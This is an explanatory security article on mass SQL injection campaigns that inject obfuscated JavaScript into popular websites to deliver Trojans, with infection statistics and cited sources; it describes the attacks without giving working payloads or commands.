SQL injection attacks are evolving as one of the primary modes of transportation for malicious scripts that hackers insert into legitimate websites. According to recent events, this method is becoming very popular among the hacker elite, especially considering the number of sites they are able to exploit almost overnight. Some of these victim sites include the United Nations and the Department of Homeland Security (DHS).[1] Typically they will use the website as a vehicle for distributing Trojans through encoded JavaScript that a SQL injection inserted into the website.

The scary part is that the average rate of infection among “protected” networks is anywhere from 70–75% according to research conducted by PandaLabs on over 1,200 networks across the globe.[2] This study was conducted with www.infectedornot.com and www.malwareradar.com during a two-month time span as part of an ongoing study into criminal prevalence on the Internet. These statistics were derived from PCs that had up-to-date anti-virus software, but were still being infected with malware known by the industry.

What mystifies researchers is how criminals are gaining access to websites without administrative privileges or exploiting specific server-side vulnerabilities. Hackers have discovered a generic SQL string capable of inserting malicious scripts in hundreds of thousands of sites in a short period of time, in a matter of hours in some cases. Hackers use this string to embed JavaScript code generically into hundreds of thousands of websites. The key is to find a string generic enough, but effective 80–90% of the time, to take advantage of web coding vulnerabilities.

Websites that fall victim to these attacks are sites that you normally wouldn’t expect to host malicious scripts, for example, www.flowers.com, www.dhs.gov, and www.un.org. These highly popular sites allow hackers to victimize as many visitors as possible; if profit is the true motivation, it’s a perfect breeding ground for criminal activity.

The encoded JavaScript embedded in the victim web pages consists of a delivery mechanism to infect visitors with Trojans. However, the malware itself is not embedded, but rather hosted elsewhere and in some cases will use server-side polymorphism to randomly change binaries dynamically. For the malware to be properly executed in a different context on the visitor’s PC, the script contains instructions to determine if the PC can be exploited by running a check against a number of common vulnerabilities. In addition, some of these attacks take advantage of zero-day vulnerabilities to spread malware to unsuspecting users as was the case with the recent Adobe Flash exposure.[3]

The JavaScript code being used to exploit the vulnerability uses obfuscation and encoding techniques, making it very difficult to analyze (e.g., using hexadecimal encoding to hide actual Java code 65%3D%22%6A%61%76%). Thus, the true intention behind the script (exploitation of vulnerabilities) cannot be seen by simply viewing the .JS file. It takes clever decoding to reveal the presence of actual exploit code and subsequently create a defense mechanism against it.

The net effect is extra time and effort on the part of the anti-virus lab engineer to create an effective vaccination for malware delivered through encoded JavaScript. It’s fairly easy for the hacker to change the payload delivered via these scripts as the malware resides on a completely different server and it would not surprise us if the binaries were programmed to change frequently.

Some recent hacking campaigns have shown that between 250,000 and 500,000 sites can be generically compromised almost overnight without much effort.[4] For instance, attackers are using tools that incorporate the Google API framework to automate the discovery and validation of target sites, which in normal circumstances would be conducted manually on a per-site basis.

Using Google these tools perform a diversified search against a vast population of websites looking for sites that do not properly sanitize their inputs or that may contain other generic web coding vulnerabilities.

Hackers can now reach out and touch anyone despite high levels of protection that consumers and businesses have installed on their networks and PCs. SQL attacks are becoming more prevalent with the anonymity that the Internet affords the attackers, making it harder and harder for them to be caught. Your best bet is to ensure that your network and systems are frequently monitored to avoid being compromised by hackers.

References

1. Goodin, Dan. “Department of Homeland Security website hacked!” The Register.
   
2. Bustamente, Pedro. “Think you're protected? Think again.” Panda Research Blog.
   
3. Maone, Giorgio. “Unpatched Flash Vulnerability Widely Exploited in the Wild.” http://hackademix.net.
   
4. SC Magazine Podcast on Massive SQL Injection Attack.